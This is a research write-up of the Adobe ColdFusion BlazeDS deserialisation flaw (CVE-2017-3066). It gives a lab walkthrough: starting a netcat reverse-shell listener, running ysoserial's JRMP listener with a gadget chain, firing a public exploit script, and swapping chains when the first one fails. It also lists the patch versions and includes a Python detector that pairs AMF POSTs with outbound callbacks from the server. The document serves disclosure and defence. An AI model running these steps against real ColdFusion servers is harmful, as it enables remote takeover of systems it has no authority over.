CVE-2017-3066 : Adobe Coldfusion BlazeDS Java Object Deserialisation RCE | Lucideus Research

[Difficulty Level: Medium, CVSS v3 Base Score: 9.8]

Introduction
Adobe ColdFusion, a commercial rapid web application development platform from Adobe, is affected by a Java deserialisation flaw in the Apache BlazeDS library it bundles. BlazeDS deserialises untrusted Java objects carried in AMF messages sent to the ColdFusion server, which lets a remote attacker execute arbitrary code on the server (a Remote Code Execution vulnerability; the 9.8 base score reflects network access with no authentication or user interaction required).

Adobe Coldfusion
Adobe ColdFusion is a commercial rapid web application development platform created by JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though it is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it became a full platform that included an IDE in addition to a full scripting language.


Affected Platforms
  • Adobe ColdFusion 2016 Update 3 and earlier
  • Adobe ColdFusion 11 update 11 and earlier 
  • ColdFusion 10 Update 22 and earlier
Lab Environment
  • Victim's Machine : Windows 7 x64, Adobe ColdFusion 2016 Update 2 (trial version)
  • Attacker's Machine : Kali Linux 2017.3, ysoserial JRMP Listener [4], Netcat

Security Patches : Upgrade to Adobe ColdFusion version 10 update 23 / 11 update 12 / 2016 update 4 or later. https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html

Proof of Concept
  • Run the Adobe ColdFusion 2016 trial on Windows 7 Ultimate on port 4444 and check the IP address of the victim's machine: cmd > ipconfig
  • Check the IP address of the attacker's machine: $ terminal > ifconfig
  • Download the Python exploit (Exploit-DB ID 43993) and save it on the Desktop of the attacker's machine.
  • Clone ysoserial, which provides the JRMP listener [4], to the Desktop of the Kali machine and build it (mvn clean package -DskipTests, as described in its README) so that the ysoserial jar is available:
$ git clone https://github.com/frohoff/ysoserial
  • Start the listeners on the attacker's machine first, because the victim connects back as soon as the exploit is sent. The Netcat listener receives the reverse shell:
$ nc -lvp 4444
  • The JRMP listener serves the gadget chain to the victim when it connects. Its port must match the [Port to Listen] argument later passed to the exploit, and the last argument is the command the payload runs on the victim (for example, one that connects back to the Netcat listener on port 4444):
$ java -cp [Path of ysoserial jar file] ysoserial.exploit.JRMPListener [Port to Listen] CommonsCollections1 '[command to run on the victim]'
  • Trigger the flaw. The script posts an AMF message to ColdFusion's BlazeDS endpoint containing a serialised Java object that refers to the attacker's JRMP listener; when ColdFusion deserialises it, the server connects to the listener, deserialises the gadget chain it receives, and executes the command:
$ python 43993.py [Victim's IP] [Port used by Adobe ColdFusion] [Attacker's IP] [Port to Listen]

Caveat: the CommonsCollections1 chain depends on the AnnotationInvocationHandler gadget, which Java 8u72 and later no longer allow. If the JRMP listener logs the victim's connection but no shell arrives, retry with another chain that ysoserial ships (for example CommonsCollections5 or CommonsCollections6) before assuming the target is patched.

Access is obtained through the JRMP listener: ysoserial logs the victim's callback, and the reverse shell spawned by the payload command arrives on the Netcat listener on port 4444.
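The procedure above has a network signature a defender can look for: an HTTP POST to a BlazeDS gateway path, followed within seconds by the ColdFusion server itself opening an outbound TCP connection to the requester (the JRMP callback) and, if the payload succeeds, to the reverse-shell listener. The script below correlates the two and is an added example for this write-up, not code from the Exploit-DB exploit, Adobe, or ysoserial. The access-log and connection-log lines are constructed for illustration, the server address 10.0.0.5, the internal range 10.0.0.0/8, and the gateway-path prefixes (/flex2gateway/ and /messagebroker/) are assumptions to adjust for a real deployment.

```python
"""Correlate inbound AMF gateway requests with outbound connections
opened by the ColdFusion host shortly afterwards (CVE-2017-3066 pattern).

Added example, not the exploit script or vendor code. Log formats,
addresses and gateway paths below are constructed/assumed.
"""
import ipaddress
import re
from datetime import datetime, timedelta, timezone

CF_HOST = "10.0.0.5"                                  # assumed ColdFusion server
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed internal range
AMF_PATH = re.compile(r"^/(flex2gateway|messagebroker)/")  # assumed BlazeDS paths
WINDOW = timedelta(seconds=60)

# Constructed sample data: 203.0.113.20 plays the attacker, 10.0.0.9 is a
# legitimate Flash client inside the network, 198.51.100.8 only probes.
ACCESS_LOG = """\
10.0.0.9 - - [12/Mar/2018:10:14:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.20 - - [12/Mar/2018:10:15:31 +0000] "POST /flex2gateway/amf HTTP/1.1" 200 245 "-" "python-requests/2.18.4"
10.0.0.9 - - [12/Mar/2018:10:16:00 +0000] "POST /flex2gateway/amf HTTP/1.1" 200 1021 "http://intranet/app.swf" "Mozilla/5.0 (Windows NT 6.1) Flash"
198.51.100.8 - - [12/Mar/2018:10:20:00 +0000] "POST /messagebroker/amf HTTP/1.1" 500 77 "-" "curl/7.58.0"
"""

CONN_LOG = """\
2018-03-12T10:15:32Z src=10.0.0.5 sport=49211 dst=203.0.113.20 dport=1099 proto=tcp action=allow
2018-03-12T10:15:33Z src=10.0.0.5 sport=49212 dst=203.0.113.20 dport=4444 proto=tcp action=allow
2018-03-12T10:16:01Z src=10.0.0.5 sport=49213 dst=10.0.0.7 dport=1433 proto=tcp action=allow
"""

ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
CONN_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) sport=\d+ dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)


def parse_access(text):
    """Parse combined-format access log lines into dicts with aware timestamps."""
    out = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        out.append(rec)
    return out


def parse_conns(text):
    """Parse firewall-style connection records (constructed key=value format)."""
    out = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        rec["dport"] = int(rec["dport"])
        out.append(rec)
    return out


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_callbacks(access_text, conn_text, server=CF_HOST, window=WINDOW):
    """Return one finding per AMF POST that is followed, within `window`, by the
    ColdFusion server opening a TCP connection back to the requesting client
    or to any non-internal address. A POST with no such callback (a plain
    probe) and normal server-to-database traffic are not reported."""
    conns = [c for c in parse_conns(conn_text) if c["src"] == server]
    findings = []
    for req in parse_access(access_text):
        if req["method"] != "POST" or not AMF_PATH.match(req["path"]):
            continue
        suspect = [
            c for c in conns
            if req["ts"] <= c["ts"] <= req["ts"] + window
            and (c["dst"] == req["client"] or not is_internal(c["dst"]))
        ]
        if suspect:
            findings.append({
                "client": req["client"],
                "path": req["path"],
                "user_agent": req["ua"],
                "callbacks": [(c["dst"], c["dport"]) for c in suspect],
            })
    return findings


if __name__ == "__main__":
    for f in find_callbacks(ACCESS_LOG, CONN_LOG):
        print(f"{f['client']} POST {f['path']} ({f['user_agent']}) "
              f"-> server connected out to {f['callbacks']}")
```

On the sample data only the 203.0.113.20 request is reported, with the server's outbound connections to ports 1099 and 4444 on that host; the intranet Flash client's POST is followed only by a database connection inside 10.0.0.0/8 and stays quiet. In practice the outbound-connection rule is the stronger signal, since a patched server still answers AMF POSTs but never dials back to the client.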
References
  • [1] https://nvd.nist.gov/vuln/detail/CVE-2017-3066
  • [2] https://en.wikipedia.org/wiki/Adobe_ColdFusion
  • [3] https://www.adobe.com/products/coldfusion-family.html
  • [4] https://github.com/frohoff/ysoserial
  • [5] https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
